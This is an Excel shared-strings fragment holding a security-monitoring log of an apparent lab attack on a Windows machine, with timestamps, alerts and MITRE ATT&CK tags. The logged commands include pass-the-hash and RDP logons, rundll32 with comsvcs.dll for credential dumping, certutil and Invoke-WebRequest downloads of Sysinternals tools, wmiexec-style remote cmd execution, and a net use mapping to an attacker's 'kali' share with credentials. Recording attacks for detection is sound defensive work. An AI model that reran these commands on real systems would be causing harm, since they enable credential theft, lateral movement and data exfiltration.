  </si>
  <si>
    <t>May 9, 2025 @ 15:16:01.284</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:16:02.267</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:16:02.281</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:16:03.144</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:16:03.146</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:16:19.537</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:16:19.543</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:17:06.525</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:17:06.592</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:17:06.593</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:17:06.604</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:17:11.834</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:17:40.335</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:17:40.343</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:17:40.386</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:17:47.858</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:18:48.081</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:18:48.082</t>
  </si>
  <si>
    <t>Successful Remote Logon Detected - User:\Engineer - NTLM authentication, possible pass-the-hash attack.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:19:03.773</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:19:26.134</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:19:26.147</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:19:26.193</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:19:27.213</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:19:27.221</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:19:27.229</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:19:29.606</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:19:30.679</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:19:30.697</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:19:55.180</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:19:55.198</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:21:03.462</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:21:03.509</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:21:03.510</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:22:03.294</t>
  </si>
  <si>
    <t>Attack Step 2</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:24:01.640</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:24:01.646</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:24:01.772</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\wsmprovhost.exe -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:24:04.377</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:25:14.025</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:25:14.035</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:25:34.158</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:25:34.167</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:26:03.134</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:26:03.151</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:26:03.178</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:26:03.236</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:26:14.101</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:26:14.108</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:26:20.415</t>
  </si>
  <si>
    <t>Powershell executing process discovery</t>
  </si>
  <si>
    <t>[T1057]</t>
  </si>
  <si>
    <t>[Process Discovery]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:26:30.759</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:26:30.769</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:26:30.786</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:26:30.787</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:26:30.795</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:26:31.890</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:27:18.461</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:27:18.469</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:27:18.475</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\rundll32.exe\" C:\\Windows\\System32\\comsvcs.dll</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:27:42.928</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:27:42.956</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:28:46.036</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:29:07.644</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:29:07.679</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:29:41.347</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\certutil.exe\" -urlcache -split -f https://download.sysinternals.com/files/Procdump.zip procdump.zip</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:29:41.367</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:29:41.399</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:29:41.916</t>
  </si>
  <si>
    <t>Trojan:Win32/Ceprolad.A</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:29:42.002</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:29:42.060</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\certutil.exe\" \"C:\\WINDOWS\\system32\\certutil.exe\" -urlcache -split -f https://download.sysinternals.com/files/Procdump.zip procdump.zip</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:29:45.309</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:29:45.991</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:29:49.424</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:29:49.436</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:29:49.446</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:29:49.454</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:29:49.479</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:29:49.484</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:29:52.144</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:30:12.089</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:30:12.134</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:30:12.146</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:30:12.149</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:30:16.779</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:30:17.893</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:30:24.072</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:30:24.091</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:30:28.101</t>
  </si>
  <si>
    <t>CommandInvocation(Invoke-WebRequest): \"Invoke-WebRequest\"  ParameterBinding(Invoke-WebRequest): name=\"Uri\"; value=\"https://download.sysinternals.com/files/PSTools.zip\"  ParameterBinding(Invoke-WebRequest): name=\"OutFile\"; value=\"C:\\Users\\Public\\PSTools.zip\"</t>
  </si>
  <si>
    <t>Invoke Webrequest executed, possible download cradle detected.</t>
  </si>
  <si>
    <t>[T1059.001]</t>
  </si>
  <si>
    <t>[PowerShell]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:30:28.133</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:30:48.011</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:30:48.019</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:30:58.591</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:02.044</t>
  </si>
  <si>
    <t>CommandInvocation(Invoke-WebRequest): \"Invoke-WebRequest\"  ParameterBinding(Invoke-WebRequest): name=\"Uri\"; value=\"https://download.sysinternals.com/files/PSTools.zip\"  ParameterBinding(Invoke-WebRequest): name=\"OutFile\"; value=\"C:\\Users\\Public\\PSTools3.zip\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:28.928</t>
  </si>
  <si>
    <t>Powershell script executed "Expand-Archive"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:30.273</t>
  </si>
  <si>
    <t>Executable file dropped in Users\Public folder</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:30.317</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:30.370</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:30.413</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:30.424</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:30.467</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:30.526</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:30.530</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:30.595</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:30.649</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:30.670</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:30.697</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:30.745</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:30.753</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:30.826</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:30.829</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:30.873</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:30.881</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:30.938</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:30.966</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:31.000</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:31.043</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:31.044</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:31.082</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:31.111</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:31.137</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:31.576</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\System32\\SearchFilterHost.exe\" 892 2608 2784 872 {5E941D80-BF96-11CD-B579-08002B30BFEB}</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:41.071</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:42.263</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:43.650</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:43.666</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:47.655</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:47.672</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:47.691</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:48.124</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:31:48.135</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:32:14.141</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:32:17.064</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:33:12.335</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:33:12.345</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:33:31.504</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:22.360</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:22.361</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:22.386</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:22.411</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:22.441</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:22.479</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:22.481</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:22.527</t>
  </si>
  <si>
    <t>cmd.exe /Q /c cd \\ 1&amp;gt; \\\\127.0.0.1\\ADMIN$\\__1746801317.6653054 2&amp;gt;&amp;amp;1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:22.543</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:24.638</t>
  </si>
  <si>
    <t>cmd.exe /Q /c cd  1&amp;gt; \\\\127.0.0.1\\ADMIN$\\__1746801317.6653054 2&amp;gt;&amp;amp;1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:24.644</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:34.654</t>
  </si>
  <si>
    <t>cmd.exe /Q /c whoami 1&amp;gt; \\\\127.0.0.1\\ADMIN$\\__1746801317.6653054 2&amp;gt;&amp;amp;1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:34.655</t>
  </si>
  <si>
    <t>whoami</t>
  </si>
  <si>
    <t>Suspicious Windows cmd shell execution</t>
  </si>
  <si>
    <t>[T1087 T1059.003]</t>
  </si>
  <si>
    <t>[Discovery, Execution]</t>
  </si>
  <si>
    <t>[Account Discovery, Windows Command Shell]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:34.680</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:34.886</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:42.655</t>
  </si>
  <si>
    <t>cmd.exe /Q /c whoami /priv 1&amp;gt; \\\\127.0.0.1\\ADMIN$\\__1746801317.6653054 2&amp;gt;&amp;amp;1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:42.661</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:42.674</t>
  </si>
  <si>
    <t>whoami  /priv</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:42.842</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:48.653</t>
  </si>
  <si>
    <t>cmd.exe /Q /c arp -a 1&amp;gt; \\\\127.0.0.1\\ADMIN$\\__1746801317.6653054 2&amp;gt;&amp;amp;1</t>
  </si>
  <si>
    <t>arp  -a</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:48.669</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:48.701</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:35:48.913</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:36:10.564</t>
  </si>
  <si>
    <t>cmd.exe /Q /c dir 1&amp;gt; \\\\127.0.0.1\\ADMIN$\\__1746801317.6653054 2&amp;gt;&amp;amp;1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:36:10.576</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:36:39.139</t>
  </si>
  <si>
    <t>cmd.exe /Q /c ipconfig 1&amp;gt; \\\\127.0.0.1\\ADMIN$\\__1746801317.6653054 2&amp;gt;&amp;amp;1</t>
  </si>
  <si>
    <t>ipconfig</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:36:39.187</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:36:39.266</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:36:39.508</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:36:57.674</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:37:39.950</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:37:41.424</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:38:10.984</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:41:03.628</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:41:03.635</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:41:12.010</t>
  </si>
  <si>
    <t>Powershell script querying system environment variables</t>
  </si>
  <si>
    <t>[T1082]</t>
  </si>
  <si>
    <t>[System Information Discovery]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:41:13.612</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:41:13.628</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:41:14.546</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:41:14.585</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:41:28.489</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:41:30.895</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:41:32.209</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:41:32.242</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\msiexec.exe /V</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:41:33.552</t>
  </si>
  <si>
    <t>Windows installer reconfigured the product.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:41:49.303</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:42:15.014</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:42:15.015</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:42:15.116</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:42:28.812</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:44:20.053</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:44:20.059</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:44:20.153</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:44:48.647</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:44:48.995</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:44:49.040</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:45:53.773</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:45:53.785</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:45:58.746</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:45:58.755</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:45:58.761</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\net.exe\" use \\\\10.12.25.23\\MyShare /user:kali kali</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:45:58.836</t>
  </si>
  <si>
    <t>A net.exe connection to a remote resource was started by C:\\Windows\\System32\\wsmprovhost.exe</t>
  </si>
  <si>
    <t>[T1567]</t>
  </si>
  <si>
    <t>[Exfiltration]</t>
  </si>
  <si>
    <t>[Exfiltration Over Web Service]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:46:01.952</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:46:01.962</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:46:01.976</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:46:01.989</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:46:04.331</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:46:25.554</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:46:25.562</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:46:25.610</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:46:33.936</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:47:34.906</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:47:34.907</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:47:35.360</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:47:35.633</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:47:35.860</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:47:35.915</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:47:43.067</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:47:43.174</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:47:44.577</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:47:44.622</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:47:46.397</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:47:52.981</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:47:52.989</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:47:52.995</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\net.exe\" use \\\\10.12.25.23\\MyShare /delete</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:47:53.025</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:48:15.978</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:52:11.529</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:52:11.538</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:55:47.075</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:55:47.178</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:55:47.364</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:55:48.558</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:55:48.573</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:55:48.582</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:55:48.590</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:55:50.395</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:55:54.905</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:55:56.102</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\AppHostRegistrationVerifier.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:55:56.106</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:55:56.117</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:55:58.735</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:55:58.767</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:55:58.769</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:56:26.958</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:56:26.988</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:56:26.996</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:56:28.255</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:56:35.931</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:57:03.124</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:57:03.149</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:57:03.160</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:57:03.168</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:57:16.510</t>
  </si>
  <si>
    <t>Attack Step 3</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:17.390</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:17.414</t>
  </si>
  <si>
    <t>Successful Remote Logon Detected - User:\Windows11 - NTLM authentication, possible pass-the-hash attack - Possible RDP connection. Verify that kali is allowed to perform RDP connections</t>
  </si>
  <si>
    <t>[T1550.002 T1078.002 T1021.001]</t>
  </si>
  <si>
    <t>[Pass the Hash, Domain Accounts, Remote Desktop Protocol]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:17.458</t>
  </si>
  <si>
    <t>\\SystemRoot\\System32\\smss.exe 000000cc 000000dc</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:17.491</t>
  </si>
  <si>
    <t>%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:17.509</t>
  </si>
  <si>
    <t>winlogon.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:18.718</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:20.278</t>
  </si>
  <si>
    <t>Non network or service local logon.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:20.348</t>
  </si>
  <si>
    <t>\"fontdrvhost.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:20.540</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:20.576</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:20.579</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:20.720</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:20.763</t>
  </si>
  <si>
    <t>\"LogonUI.exe\" /flags:0x2 /state0:0xa3dbd855 /state1:0x41c64e6d</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:20.849</t>
  </si>
  <si>
    <t>\"dwm.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:20.868</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\DllHost.exe /Processid:{6C752774-29FB-4E50-8BB1-97098425A77C}</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:20.869</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:20.870</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:20.871</t>
  </si>
  <si>
    <t>\"C:\\Windows\\System32\\WUDFHost.exe\" -HostGUID:{193a1820-d9ac-4997-8c55-be817523f6aa} -IoEventPortName:\\UMDFCommunicationPorts\\WUDF\\HostProcess-eaa23b32-0ee2-4f4a-ae2a-5d1230d20af9 -SystemEventPortName:\\UMDFCommunicationPorts\\WUDF\\HostProcess-abdfbb4c-86f8-4046-8c97-823fbf44891b -IoCancelEventPortName:\\UMDFCommunicationPorts\\WUDF\\HostProcess-c68799f3-716a-4339-b182-1461e0fe3140 -NonStateChangingEventPortName:\\UMDFCommunicationPorts\\WUDF\\HostProcess-a2c679c0-2a8a-4426-b500-974f64498121 -LifetimeId:a1f36aec-247a-4b21-84ad-3ecdccebd231 -DeviceGroupId: -HostArg:16</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:21.214</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:21.264</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:22.335</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:22.393</t>
  </si>
  <si>
    <t>/QuitInfo:0000000000000F3C;0000000000000F90;</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:23.826</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:23.878</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:23.958</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:24.034</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:24.042</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:24.100</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:24.146</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:24.272</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:24.344</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:24.453</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:24.516</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:24.611</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:24.698</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:24.746</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:24.834</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:27.069</t>
  </si>
  <si>
    <t>User: WORKGROUP\Windows11 logged using Remote Desktop Connection (RDP) from ip:10.12.25.23.</t>
  </si>
  <si>
    <t>[T1021.001 T1078.002]</t>
  </si>
  <si>
    <t>[Lateral Movement, Defense Evasion, Persistence, Privilege Escalation, Initial Access]</t>
  </si>
  <si>
    <t>[Remote Desktop Protocol, Domain Accounts]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:27.098</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:27.118</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:27.158</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:28.742</t>
  </si>
  <si>
    <t>\\SystemRoot\\System32\\smss.exe 00000100 000000dc</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:28.798</t>
  </si>
  <si>
    <t>\"LogonUI.exe\" /flags:0x0 /state0:0xa3d4b055 /state1:0x41c64e6d</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:28.913</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:29.019</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:29.644</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\TSTheme.exe -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:29.815</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:30.060</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:30.199</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:30.538</t>
  </si>
  <si>
    <t>\"LogonUI.exe\" /flags:0x2 /state0:0xa3d50855 /state1:0x41c64e6d</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:30.763</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:30.786</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:30.841</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:30.886</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:30.929</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:30.982</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:31.059</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:31.101</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:34.753</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:35.150</t>
  </si>
  <si>
